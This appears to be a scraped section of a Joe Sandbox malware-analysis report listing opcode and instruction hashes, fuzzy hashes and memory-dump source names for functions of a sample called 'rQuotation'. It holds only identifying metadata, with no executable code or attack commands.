                                                                                                                                                                                                                                                • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                                                                                                                                                • Instruction ID: 02aedd09fa89bbd420f9901c5ede9f81296ab96f9223d1b794003d2229529c2c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E711C136A00919AFDB19DB58CC05F9EFBF6EF84210F058269E856A7344E671AE51CB80
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                                                                                                                                                • Instruction ID: f16c77cc6ad831d0630ef32fb5e18e481e8f84ad7c070bfbc1760e953d2fc4c8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C021D6B5A40B459FD3A0CF29D541B56BBF4FB48B10F10492EE98AC7B50E371E854CB94
Memory Dump Source
• Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8cd8d710a43ff67ace25e0bac87a6bfbad10a271ed8d84431aa6cc45e5242967
                                                                                                                                                                                                                                                • Instruction ID: 8178122c395b66752ebddaee1e7c8d1ec5232a07c08bae1c51072a5e24e74664
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8cd8d710a43ff67ace25e0bac87a6bfbad10a271ed8d84431aa6cc45e5242967
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B11A131242641EFDB15EF19CD90F56BBB9FF94B44F1000A9FA059B652C635ED01CA94
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 69f621a6e04fa062b2489b5c03b9c6fc82b5364399c14139d5e62f829ee2b505
                                                                                                                                                                                                                                                • Instruction ID: 6af4eeacaec700dce817dbdaf4abc6392a9a63285a568bf8f9eeb095565985ae
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69f621a6e04fa062b2489b5c03b9c6fc82b5364399c14139d5e62f829ee2b505
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84117071541229ABDB26EB64CC46FE9B3B5FF04710F5081D8A314A61E1D7709E81CF88
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1ec6ef086862a6a398a7a096fb0073d30a9e85fbde3813d376849e57ac0560f1
                                                                                                                                                                                                                                                • Instruction ID: 9d632ffc9558422348e8f6b6f06f50e376a6929f54fc9df70661cab5a5b2c01d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ec6ef086862a6a398a7a096fb0073d30a9e85fbde3813d376849e57ac0560f1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA111772900119ABCB16DB94CC84EEFBBBDEF48354F044166A906A7211EA34AA55CBE0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                                                                                                                • Instruction ID: 2e36eb0bfe097d4fa11a6d5feadaf934dfa68bc37335da8b706ad74853fd0a7c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5001F5327001118BDF119E2DDC90B62B767FFC4A00F1541AEED058F24ADA718881C790
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1f1adaffa9b29c849875cbdab920c0a50ab0c55922a0d61b72a37d4ddd77958d
                                                                                                                                                                                                                                                • Instruction ID: 3e75e3531aa53c6a712a7b8a02320e558e9667cb4e884abe1ade898e834da9d6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f1adaffa9b29c849875cbdab920c0a50ab0c55922a0d61b72a37d4ddd77958d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8311E5326401459FD301CF18C840BA1F7B5FB56318F588159F8448B315D771EC81CBA0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: cb8387b33c08cfe14c20ce1afd7b021a9b88f3c3ed4f126f8961298fa76fac6c
                                                                                                                                                                                                                                                • Instruction ID: ae3ccdb330d005e4c166abd15f0e5b5f79636fae5ebe4c2074703bfe8af6dc43
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cb8387b33c08cfe14c20ce1afd7b021a9b88f3c3ed4f126f8961298fa76fac6c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1811E8B1E01209DFCB04DFA9D585AAEBBF8FF58250F10806AA905E7355D674EA018BA4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3fa58ae2ec068e828a91466b637bb581ab270ff9b00bd1b761646f30c16ca49c
                                                                                                                                                                                                                                                • Instruction ID: ffaf95067aa0a5adb1270350d53e5e2643b18f0af3d4195c67d3ed95e764b4f0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3fa58ae2ec068e828a91466b637bb581ab270ff9b00bd1b761646f30c16ca49c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4901B1395402119BCB32EB198890E7AFBAEFF51660B54446EEA555B211CF309D81CBA1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                                                                                                                • Instruction ID: cc7485345786a020d7f52c4ace6df6d4df49bfb6368457ec353429e96eb30445
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50012832100B059FEB3296ADCD84FA7B7EEFFC5214F14841DA6568B640DA71E542CB60
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                                                                                                                                • Instruction ID: 536df704ca985107970ea253357146fd3bcc526a550ae809ee4a4a38e127a435
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8EF0C2B2A00611ABD324CF4DDC40E57FBEADBD1A80F048128E609CB320EA31DD04CB90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 059ba8f40ab330a1eebc6966c74e5a3f6cfd3f327521f0a5194e4efc6d5d1854
                                                                                                                                                                                                                                                • Instruction ID: 323f8e608e6bac1870e1f67a107ffcbcb647ac8b02e407344d4f9c9dd2e51b92
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 059ba8f40ab330a1eebc6966c74e5a3f6cfd3f327521f0a5194e4efc6d5d1854
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A3012C71E10209EFDB04DFA9E555AAEB7F8FF58304F10406AF905E7390D674DA018BA4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                                                                                                                                • Instruction ID: 735589b40efc532852ddb5844a691c62a2a2de791e49b3b17408192ac10c924e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8FF0FC732066239BD732565D4CC0BABA59A8FD1A64F59003AE3059B304CA658F4257D1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 7bcc943351880ddb66c60e6e80ebef39936b5368b1b8c8014eda98d64923c03a
                                                                                                                                                                                                                                                • Instruction ID: 0ca6f6f46b23fc1f28113739139c2c9673cac5b7604ba6d825e1d01c59ba0b04
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7bcc943351880ddb66c60e6e80ebef39936b5368b1b8c8014eda98d64923c03a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62012171E10209EFCB04DFA9D555AAEB7F8EF58314F10405AF905E7391D67499018BA4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: fba2ba99efa0af62b5dd961f99f84d582ea9c0f6e746a83da2f6924ea3239221
                                                                                                                                                                                                                                                • Instruction ID: 3e4ea9775b17ee4760ac10f59c1e9b191a9fccd6dd9c280480a83dc38ea06021
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fba2ba99efa0af62b5dd961f99f84d582ea9c0f6e746a83da2f6924ea3239221
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8012171E00209EFDB04DFA9E545AAEB7F8EF58304F50405AF915E7390D67499018BA4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                                                                                                                                • Instruction ID: 68d84f5924046e0bf30af11222f46416099e5104b9b17e38bfa8e8edcba2d434
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2501F4326006899BD3329B1DCD09F59FB99EF81750F0841A9FF048BBA2D779D801C656
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: daeec7ff7e2618ad112bfb3736ff430b27364558256f5a4a5865f218f836afb2
                                                                                                                                                                                                                                                • Instruction ID: 469ee6b3a804b8d7b35c06c35ed7da1931910d56d1f55adc883f3ae6ed6f9bbd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: daeec7ff7e2618ad112bfb3736ff430b27364558256f5a4a5865f218f836afb2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1012C71A01249DFDB04DFA9E945EAEBBF8AF58710F14405AF901A7280D774AA01CB95
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                                                                                                                                • Instruction ID: 59653986ee8f87448cb83b078233c9268c61973f80e690887d827abc07e9ca21
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36F0127220001DBFEF019F94DD80DEF7B7EEB55398B104125FA1192160D731DD21A7A0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: ac14358568697715c5f2c17e02d44131e7b4f425b39faa24ec00915d38f7de5a
                                                                                                                                                                                                                                                • Instruction ID: 9a74efe9a5fb97d4f5a9e762dbecac01837d7605edba7d98936b502987b92624
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac14358568697715c5f2c17e02d44131e7b4f425b39faa24ec00915d38f7de5a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3DF024712142416BFB649A1D8C91BB3329AE7D0652F29802AEB099F3C1EE70DD8187A4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 917254c1126824968a08dae4c51d6e6ccebe871f5cfb1da8c767ccdbf4dbb2ae
                                                                                                                                                                                                                                                • Instruction ID: e275db6527cf01d71017000ee18f0164d217a7d9aef11f2c085bc24d996a5871
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 917254c1126824968a08dae4c51d6e6ccebe871f5cfb1da8c767ccdbf4dbb2ae
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0401A4B1604A819BE337973CCD8CF2577E4BB40B04F484698BB02AB6E7D728D4418615
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                                                                                                                • Instruction ID: 2bb1f441ac88612af5330fef7888fc091f80bac52eccbe743f4b1861e7560372
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0F0893574191347EB75AA2F9810B2AEA9F9F90A51B05052D9E57EB640DF60D8018B90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                                                                                                                                • Instruction ID: 8eceb453ba076b6ef6433e39612684b008796d573ff5e6b5c5aadf6c92ecfc4e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1DF05E72B916129BFB219B4ECC80F26F7ADBFD5A70F191069A6049B260CB64EC4187D0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c0ad9f7e3680bf86e48ec7a8f09efcced386982a265f451ea597814d5703da2a
                                                                                                                                                                                                                                                • Instruction ID: e24472036e02246268252543a36d27cbed7e082ed671867ec08ebe4cd63ee87c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c0ad9f7e3680bf86e48ec7a8f09efcced386982a265f451ea597814d5703da2a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78F0AF716063049FD310EF28C945E1BF7E4FF98710F40465AB898DB394E634E900CB96
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                                                                                                                                • Instruction ID: c1aeb9cb0cd6b1f83a73fd4aafbb43e6cde5be00100765f68461268c6d9f5d35
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7F0B472610204AFE714DB25CC01F96B6EAEF98744F25807CA645D72A1FAB0DD41C654
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2b4ca288e4eb8acf5a71ab9e8319b6ef88cf80d4f02b73f1b1f02cf7191c9573
                                                                                                                                                                                                                                                • Instruction ID: eaace41764c2c120026b2faab636f738bee81bf873d6102e2608b9ec90ad7d51
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b4ca288e4eb8acf5a71ab9e8319b6ef88cf80d4f02b73f1b1f02cf7191c9573
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5AF04F75A02249EFCB14EF69C555E6EB7F4EF18300F008069A955EB385DA34EA01CB54
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: a8b83533175e51df45843cff7b8a4c37503ba38cead96872e2e59e3b38326797
                                                                                                                                                                                                                                                • Instruction ID: 20e173d9681e1b5f74831218b1ac7e11fa86a5935f3d5bc524eb271fc988ce4d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a8b83533175e51df45843cff7b8a4c37503ba38cead96872e2e59e3b38326797
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01F090319176D19FE722CB5CCC64B33BBD8DB01E60F0A896ED54A87602CF64D880C650
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 12605af8a8624c161b48d7124bb836552005502b4b15c41b2332d09325d3e7c5
                                                                                                                                                                                                                                                • Instruction ID: f93c6c23d82abe664e80d2de7ff2a2824957c67a82fec6ddc16ecc92aa1f2c65
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12605af8a8624c161b48d7124bb836552005502b4b15c41b2332d09325d3e7c5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0AF05C2685A6C006DF327B3C78D87D9FF55A741134F091449F5A09720DC6748887C320
                                                                                                                                                                                                                                                Memory Dump Source
